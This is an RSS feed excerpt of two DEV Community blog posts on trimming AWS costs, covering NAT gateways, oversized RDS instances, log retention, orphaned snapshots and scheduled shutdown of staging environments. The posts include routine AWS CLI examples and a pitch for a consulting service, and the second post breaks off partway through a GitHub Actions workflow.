<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Yash Pritwani</title>
    <description>The latest articles on DEV Community by Yash Pritwani (@yash_pritwani_07a77613fd6).</description>
    <link>https://dev.to/yash_pritwani_07a77613fd6</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3885613%2F512bbd07-6ae3-485a-9e20-dd9e92758241.jpg</url>
      <title>DEV Community: Yash Pritwani</title>
      <link>https://dev.to/yash_pritwani_07a77613fd6</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/yash_pritwani_07a77613fd6"/>
    <language>en</language>
    <item>
      <title>We Audited 12 Startups' AWS Bills — Average Waste: 43%</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Fri, 08 May 2026 06:00:46 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/we-audited-12-startups-aws-bills-average-waste-43-100c</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/we-audited-12-startups-aws-bills-average-waste-43-100c</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/startup-aws-cost-audit-43-percent-waste" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/startup-aws-cost-audit-43-percent-waste?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=startup-aws-cost-audit-43-percent-waste" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  We Audited 12 Startups' AWS Bills — Average Waste: 43%
&lt;/h1&gt;

&lt;p&gt;Last quarter, we ran infrastructure cost audits for 12 startups (seed to Series B). The results were consistent and painful: every single one was wasting between 28% and 67% of their AWS spend.&lt;/p&gt;

&lt;p&gt;Not because they were stupid. Because AWS makes it trivially easy to provision resources and quietly expensive to maintain them.&lt;/p&gt;

&lt;p&gt;Here's exactly what we found and how to fix it in 45 minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 5 Biggest Cost Leaks (In Order of Impact)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. NAT Gateway Charges: The Silent $540/Month Tax
&lt;/h3&gt;

&lt;p&gt;Every startup we audited was running 3 NAT Gateways (one per AZ) at $180/month each — $540/month for outbound internet traffic routing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The reality:&lt;/strong&gt; A 4-person engineering team with a single-service backend does not need multi-AZ redundancy for NAT. Your app server can tolerate a single NAT Gateway. If it goes down, requests retry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Reduce to 1 NAT Gateway in your primary AZ. If your app is truly multi-AZ critical, use VPC endpoints for AWS services (S3, DynamoDB, SQS) to eliminate NAT traffic for internal AWS calls.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; $360/month (67% reduction in NAT costs)&lt;/p&gt;
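&lt;p&gt;For the VPC endpoint route: gateway endpoints for S3 and DynamoDB are free and keep that traffic off the NAT Gateway entirely. A minimal sketch (the VPC and route-table IDs are placeholders):&lt;/p&gt;

```shell
# Route S3 traffic through a free gateway endpoint instead of the NAT Gateway
# vpc-0abc123 and rtb-0abc123 are placeholders for your own IDs
aws ec2 create-vpc-endpoint \
  --vpc-id vpc-0abc123 \
  --vpc-endpoint-type Gateway \
  --service-name com.amazonaws.us-east-1.s3 \
  --route-table-ids rtb-0abc123
```

&lt;p&gt;Interface endpoints (SQS and most other services) cost roughly $7/month each, so they only pay off once NAT data-processing charges exceed that.&lt;/p&gt;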

&lt;h3&gt;
  
  
  2. Oversized RDS Instances: Paying for 12x the CPU You Need
&lt;/h3&gt;

&lt;p&gt;8 out of 12 startups were running &lt;code&gt;db.r5.xlarge&lt;/code&gt; or larger ($800+/month) with CPU utilization under 10%.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this happens:&lt;/strong&gt; The RDS instance wizard defaults to production-grade instances. Developers pick "recommended" and forget. RDS has no auto-downsize.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check your actual utilization&lt;/span&gt;
aws cloudwatch get-metric-statistics &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; AWS/RDS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--metric-name&lt;/span&gt; CPUUtilization &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--dimensions&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;DBInstanceIdentifier,Value&lt;span class="o"&gt;=&lt;/span&gt;YOUR_DB &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--start-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'30 days ago'&lt;/span&gt; &lt;span class="nt"&gt;--iso-8601&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--end-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;--iso-8601&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--period&lt;/span&gt; 86400 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--statistics&lt;/span&gt; Average Maximum
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If your P99 CPU is under 40%, drop one instance class. Under 20%? Drop two.&lt;/p&gt;

&lt;p&gt;A &lt;code&gt;db.t3.medium&lt;/code&gt; ($70/month) handles most startup workloads beautifully until you hit 500+ concurrent connections.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; $500-730/month per instance&lt;/p&gt;
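&lt;p&gt;Once the metrics confirm the oversizing, the downsize itself is a single command. A sketch; &lt;code&gt;YOUR_DB&lt;/code&gt; is a placeholder, and the change triggers a brief restart, so run it in a maintenance window:&lt;/p&gt;

```shell
# Drop to a smaller instance class; causes a short restart, so schedule it
aws rds modify-db-instance \
  --db-instance-identifier YOUR_DB \
  --db-instance-class db.t3.medium \
  --apply-immediately
```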

&lt;h3&gt;
  
  
  3. CloudWatch Log Retention: Paying Forever for Logs Nobody Reads
&lt;/h3&gt;

&lt;p&gt;Default log retention: &lt;strong&gt;Never expire&lt;/strong&gt;. Cost: $0.03/GB/month stored, $0.50/GB ingested.&lt;/p&gt;

&lt;p&gt;One startup had 4TB of CloudWatch logs going back to 2023. Cost: $120/month storage + $200/month ingestion for verbose DEBUG logs in production.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Set 14-day retention on all log groups&lt;/span&gt;
aws logs describe-log-groups &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'logGroups[].logGroupName'&lt;/span&gt; &lt;span class="nt"&gt;--output&lt;/span&gt; text | &lt;span class="se"&gt;\&lt;/span&gt;
  xargs &lt;span class="nt"&gt;-I&lt;/span&gt; &lt;span class="o"&gt;{}&lt;/span&gt; aws logs put-retention-policy &lt;span class="nt"&gt;--log-group-name&lt;/span&gt; &lt;span class="o"&gt;{}&lt;/span&gt; &lt;span class="nt"&gt;--retention-in-days&lt;/span&gt; 14
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For long-term analysis, export to S3 ($0.023/GB/month — 75% cheaper) and query with Athena on-demand.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; $200-400/month&lt;/p&gt;
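&lt;p&gt;The S3 export can be a one-off task per log group. A sketch, assuming a bucket that already grants CloudWatch Logs write access; the group and bucket names are placeholders, and &lt;code&gt;--from&lt;/code&gt;/&lt;code&gt;--to&lt;/code&gt; take epoch milliseconds:&lt;/p&gt;

```shell
# One-off export of a log group's last year to S3 for Athena queries
# /app/production and my-log-archive-bucket are placeholders
aws logs create-export-task \
  --log-group-name /app/production \
  --from $(date -d '1 year ago' +%s)000 \
  --to $(date +%s)000 \
  --destination my-log-archive-bucket
```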

&lt;h3&gt;
  
  
  4. Orphaned EBS Snapshots: Ghost Costs From Deleted Instances
&lt;/h3&gt;

&lt;p&gt;When you terminate an EC2 instance, its EBS snapshots stay. Silently. At $0.05/GB/month.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The find script:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find snapshots with no matching volume&lt;/span&gt;
aws ec2 describe-snapshots &lt;span class="nt"&gt;--owner-ids&lt;/span&gt; self &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'Snapshots[?!VolumeId].{ID:SnapshotId,Size:VolumeSize,Created:StartTime}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One client: 2.3TB of orphaned snapshots. $115/month for dead data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; $50-230/month&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Load Balancers for Internal Services: $16/Month Each for Nothing
&lt;/h3&gt;

&lt;p&gt;Every ALB costs $16/month base + traffic charges. We found startups running 4-6 ALBs for services that only communicate internally.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Replace internal ALBs with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Docker service DNS (free, already works in compose/swarm)&lt;/li&gt;
&lt;li&gt;AWS Cloud Map for service discovery ($0.10/month per service)&lt;/li&gt;
&lt;li&gt;Or simply direct IP/port references behind a VPC&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; $64-96/month&lt;/p&gt;
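&lt;p&gt;If a service still needs DNS-based discovery without an ALB, a private Cloud Map namespace is the cheap path. A sketch with placeholder names:&lt;/p&gt;

```shell
# Private DNS namespace: registered services resolve as name.internal
# inside the VPC, no load balancer required (vpc-0abc123 is a placeholder)
aws servicediscovery create-private-dns-namespace \
  --name internal \
  --vpc vpc-0abc123
```

&lt;p&gt;Each service then needs a &lt;code&gt;create-service&lt;/code&gt; and &lt;code&gt;register-instance&lt;/code&gt; call, omitted here.&lt;/p&gt;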

&lt;h2&gt;
  
  
  The 45-Minute Audit Process
&lt;/h2&gt;

&lt;p&gt;You can run this yourself. Right now.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1 (10 min): Export Cost Explorer data&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ce get-cost-and-usage &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--time-period&lt;/span&gt; &lt;span class="nv"&gt;Start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'90 days ago'&lt;/span&gt; +%Y-%m-%d&lt;span class="si"&gt;)&lt;/span&gt;,End&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%Y-%m-%d&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--granularity&lt;/span&gt; MONTHLY &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--metrics&lt;/span&gt; &lt;span class="s2"&gt;"UnblendedCost"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--group-by&lt;/span&gt; &lt;span class="nv"&gt;Type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;DIMENSION,Key&lt;span class="o"&gt;=&lt;/span&gt;SERVICE &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; json &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; cost-report.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 2 (15 min): Map utilization vs. provisioned&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;RDS: CloudWatch CPU/memory utilization&lt;/li&gt;
&lt;li&gt;EC2: CPU, network I/O&lt;/li&gt;
&lt;li&gt;Lambda: concurrent executions vs. provisioned concurrency&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 3 (10 min): Find zombies&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Unattached EBS volumes&lt;/li&gt;
&lt;li&gt;Orphaned snapshots&lt;/li&gt;
&lt;li&gt;Unused Elastic IPs ($3.60/month each when unattached)&lt;/li&gt;
&lt;li&gt;Idle load balancers (0 requests/day)&lt;/li&gt;
&lt;/ul&gt;
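&lt;p&gt;Two of those zombie checks as one-liners (the Elastic IP filter relies on unassociated addresses lacking an &lt;code&gt;AssociationId&lt;/code&gt; field):&lt;/p&gt;

```shell
# Unattached EBS volumes: status "available" means mounted to nothing
aws ec2 describe-volumes \
  --filters Name=status,Values=available \
  --query 'Volumes[].{ID:VolumeId,GB:Size}' \
  --output table

# Elastic IPs with no association (billed while they sit idle)
aws ec2 describe-addresses \
  --query 'Addresses[?!AssociationId].PublicIp' \
  --output text
```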

&lt;p&gt;&lt;strong&gt;Step 4 (10 min): Calculate savings&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Right-size instances (match actual utilization + 30% headroom)&lt;/li&gt;
&lt;li&gt;Eliminate orphaned resources&lt;/li&gt;
&lt;li&gt;Set retention policies&lt;/li&gt;
&lt;li&gt;Remove unnecessary redundancy&lt;/li&gt;
&lt;/ul&gt;
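&lt;p&gt;The right-sizing arithmetic is worth sanity-checking before you pick a target class. A sketch with hypothetical numbers:&lt;/p&gt;

```shell
# Hypothetical workload: 8 provisioned vCPUs, observed P99 CPU of 22%
peak_pct=22
provisioned_vcpus=8

# Capacity actually needed = observed peak + 30% headroom
needed=$(awk -v p="$peak_pct" -v v="$provisioned_vcpus" 'BEGIN { printf "%.1f", v * p / 100 * 1.3 }')
echo "vCPUs needed with headroom: $needed"   # prints 2.3
```

&lt;p&gt;2.3 vCPUs of real demand on 8 provisioned: roughly 3-4x oversized, which is exactly the pattern the audits keep finding.&lt;/p&gt;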

&lt;h2&gt;
  
  
  Results Across 12 Audits
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Startup Stage&lt;/th&gt;
&lt;th&gt;Monthly AWS&lt;/th&gt;
&lt;th&gt;Waste Found&lt;/th&gt;
&lt;th&gt;Post-Audit Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Pre-seed (2 eng)&lt;/td&gt;
&lt;td&gt;$800&lt;/td&gt;
&lt;td&gt;52%&lt;/td&gt;
&lt;td&gt;$384&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Seed (5 eng)&lt;/td&gt;
&lt;td&gt;$2,400&lt;/td&gt;
&lt;td&gt;43%&lt;/td&gt;
&lt;td&gt;$1,368&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Series A (12 eng)&lt;/td&gt;
&lt;td&gt;$5,100&lt;/td&gt;
&lt;td&gt;38%&lt;/td&gt;
&lt;td&gt;$3,162&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Series B (25 eng)&lt;/td&gt;
&lt;td&gt;$12,000&lt;/td&gt;
&lt;td&gt;41%&lt;/td&gt;
&lt;td&gt;$7,080&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Average savings: 43%. Zero performance impact. Zero downtime.&lt;/p&gt;

&lt;h2&gt;
  
  
  When Self-Hosting Makes More Sense
&lt;/h2&gt;

&lt;p&gt;If your post-audit AWS bill is still above $2,000/month for a straightforward stack (web app + DB + cache + queue), self-hosting may save you another 80-90%.&lt;/p&gt;

&lt;p&gt;We run 84 containers for $45/month on a single Proxmox node. Same stack that costs $2,400 on AWS.&lt;/p&gt;

&lt;p&gt;That's a different conversation — but the audit comes first. Know your real spend before deciding your platform strategy.&lt;/p&gt;

&lt;h2&gt;
  
  
  Get Your Free Audit
&lt;/h2&gt;

&lt;p&gt;We do free 15-minute cloud cost reviews. No pitch, no obligation. We screen-share, run the commands above against your account, and tell you exactly what you're wasting.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Book a slot:&lt;/strong&gt; &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;techsaas.cloud/contact&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Or run the audit yourself with our free PDF checklist that includes all the CLI commands above plus 12 more checks we run.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Your Staging Environment Costs More Than Production — And Nobody Notices</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Fri, 08 May 2026 06:00:44 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/your-staging-environment-costs-more-than-production-and-nobody-notices-1abi</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/your-staging-environment-costs-more-than-production-and-nobody-notices-1abi</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/staging-environment-costs-more-than-production" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/staging-environment-costs-more-than-production?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=staging-environment-costs-more-than-production" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Your Staging Environment Costs More Than Production — And Nobody Notices
&lt;/h1&gt;

&lt;p&gt;In 8 out of our last 10 infrastructure audits, the staging environment cost more than production. Not by a little — often 30-50% more.&lt;/p&gt;

&lt;p&gt;Nobody noticed because staging bills get lumped into "infrastructure costs" and nobody questions them.&lt;/p&gt;

&lt;h2&gt;
  
  
  How Staging Sneaks Past Production
&lt;/h2&gt;

&lt;p&gt;Here's the typical pattern:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;When production was set up:&lt;/strong&gt; careful capacity planning, right-sized instances, auto-scaling configured, alarms set.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;When staging was set up:&lt;/strong&gt; "Just copy the production config so it's a faithful replica."&lt;/p&gt;

&lt;p&gt;And then:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Factor&lt;/th&gt;
&lt;th&gt;Production&lt;/th&gt;
&lt;th&gt;Staging&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Instance size&lt;/td&gt;
&lt;td&gt;t3.xlarge (right-sized)&lt;/td&gt;
&lt;td&gt;t3.xlarge (copied from prod)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Traffic&lt;/td&gt;
&lt;td&gt;50K requests/day&lt;/td&gt;
&lt;td&gt;200 requests/day&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Running hours&lt;/td&gt;
&lt;td&gt;24/7 (needed)&lt;/td&gt;
&lt;td&gt;24/7 (nobody turned it off)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auto-scaling&lt;/td&gt;
&lt;td&gt;Configured&lt;/td&gt;
&lt;td&gt;Copied but never triggers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data retention&lt;/td&gt;
&lt;td&gt;30-day rotation&lt;/td&gt;
&lt;td&gt;"Never expire" (nobody set policy)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Snapshots&lt;/td&gt;
&lt;td&gt;Weekly, pruned&lt;/td&gt;
&lt;td&gt;Daily (default), never pruned&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Production was optimized. Staging was forgotten.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Real Cost Comparison
&lt;/h2&gt;

&lt;p&gt;One client's actual AWS bill breakdown:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Production Environment:
  EC2 (auto-scaled):    $480/mo
  RDS (t3.medium):      $70/mo
  ElastiCache:          $150/mo
  ALB:                  $25/mo
  CloudWatch:           $45/mo
  EBS + Snapshots:      $60/mo
  NAT Gateway:          $180/mo
  ─────────────────────────────
  Total:                $1,010/mo

Staging Environment:
  EC2 (same size, no scaling): $720/mo  ← bigger because no auto-scale down
  RDS (r5.large "just in case"): $400/mo  ← someone picked a bigger instance
  ElastiCache:          $150/mo
  ALB:                  $25/mo
  CloudWatch:           $120/mo  ← verbose logging nobody reads
  EBS + Snapshots:      $180/mo  ← daily snapshots, never pruned
  NAT Gateway:          $180/mo
  ─────────────────────────────
  Total:                $1,775/mo  ← 76% MORE than production
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Staging: $1,775/mo. Production: $1,010/mo.&lt;/strong&gt; For an environment that handles 0.4% of the traffic.&lt;/p&gt;

&lt;h2&gt;
  
  
  Fix 1: Schedule-Based Shutdown (65% Savings Immediately)
&lt;/h2&gt;

&lt;p&gt;Your staging environment doesn't need to run at 3 AM on Sunday.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# AWS Lambda function triggered by EventBridge schedule&lt;/span&gt;
&lt;span class="c"&gt;# Stop staging at 8 PM, start at 8 AM, weekdays only&lt;/span&gt;

&lt;span class="c"&gt;# Stop Rule (cron: 0 20 ? * MON-FRI *)&lt;/span&gt;
aws ec2 stop-instances &lt;span class="nt"&gt;--instance-ids&lt;/span&gt; i-staging-web i-staging-worker

&lt;span class="c"&gt;# Start Rule (cron: 0 8 ? * MON-FRI *)&lt;/span&gt;
aws ec2 start-instances &lt;span class="nt"&gt;--instance-ids&lt;/span&gt; i-staging-web i-staging-worker
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Running hours:&lt;/strong&gt; 24/7 = 720 hours/month → weekday 8 AM-8 PM ≈ 260 hours/month.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; ~65% reduction on compute costs. Immediately. No impact on anyone.&lt;/p&gt;
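&lt;p&gt;One way to wire the stop rule, sketched with the EventBridge CLI (the Lambda ARN is a placeholder; the function body runs the &lt;code&gt;stop-instances&lt;/code&gt; call above):&lt;/p&gt;

```shell
# Schedule rule: fire at 20:00 UTC, Monday through Friday
aws events put-rule \
  --name stop-staging \
  --schedule-expression 'cron(0 20 ? * MON-FRI *)'

# Point the rule at the Lambda that stops the instances (ARN is a placeholder)
aws events put-targets \
  --rule stop-staging \
  --targets 'Id=1,Arn=arn:aws:lambda:us-east-1:123456789012:function:stop-staging'
```

&lt;p&gt;The start rule is the same pattern with &lt;code&gt;cron(0 8 ? * MON-FRI *)&lt;/code&gt;, and the Lambda needs an &lt;code&gt;events.amazonaws.com&lt;/code&gt; invoke permission via &lt;code&gt;aws lambda add-permission&lt;/code&gt;.&lt;/p&gt;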

&lt;p&gt;For Docker-based staging, even simpler:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Crontab on staging server&lt;/span&gt;
0 20 &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; 1-5 docker compose &lt;span class="nt"&gt;-f&lt;/span&gt; docker-compose.staging.yml stop
0 8  &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; 1-5 docker compose &lt;span class="nt"&gt;-f&lt;/span&gt; docker-compose.staging.yml start
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Fix 2: Right-Size Staging Instances (Additional 50-70% Savings)
&lt;/h2&gt;

&lt;p&gt;Staging doesn't need production capacity. It needs enough to run your test suite and let QA click through flows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rule of thumb:&lt;/strong&gt; Staging instances should sit at least two instance classes below production.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Production&lt;/th&gt;
&lt;th&gt;Staging&lt;/th&gt;
&lt;th&gt;Monthly Savings&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;t3.xlarge ($120/mo)&lt;/td&gt;
&lt;td&gt;t3.small ($15/mo)&lt;/td&gt;
&lt;td&gt;$105 (87%)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;r5.large ($180/mo)&lt;/td&gt;
&lt;td&gt;t3.medium ($30/mo)&lt;/td&gt;
&lt;td&gt;$150 (83%)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;m5.2xlarge ($280/mo)&lt;/td&gt;
&lt;td&gt;t3.large ($60/mo)&lt;/td&gt;
&lt;td&gt;$220 (78%)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;"But staging should mirror production!"&lt;/strong&gt; No. Staging should mirror production's &lt;em&gt;architecture&lt;/em&gt;, not its &lt;em&gt;capacity&lt;/em&gt;. Same services, same networking, same config — smaller instances.&lt;/p&gt;

&lt;p&gt;If your app works on a t3.small, it'll work on a t3.xlarge. Functionally, the reverse is also true: instance size affects capacity and speed under load, not correctness.&lt;/p&gt;
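&lt;p&gt;Downsizing an existing staging instance is a stop/modify/start cycle. A sketch with a placeholder instance ID:&lt;/p&gt;

```shell
# Resize an EC2 instance: it must be stopped before the type can change
aws ec2 stop-instances --instance-ids i-0abc123
aws ec2 wait instance-stopped --instance-ids i-0abc123

aws ec2 modify-instance-attribute \
  --instance-id i-0abc123 \
  --instance-type '{"Value": "t3.small"}'

aws ec2 start-instances --instance-ids i-0abc123
```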

&lt;h2&gt;
  
  
  Fix 3: Ephemeral Staging (90%+ Savings)
&lt;/h2&gt;

&lt;p&gt;The best staging environment is one that doesn't exist until you need it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# GitHub Actions: spin up staging per PR&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;PR Staging&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pull_request&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;types&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;opened&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;synchronize&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
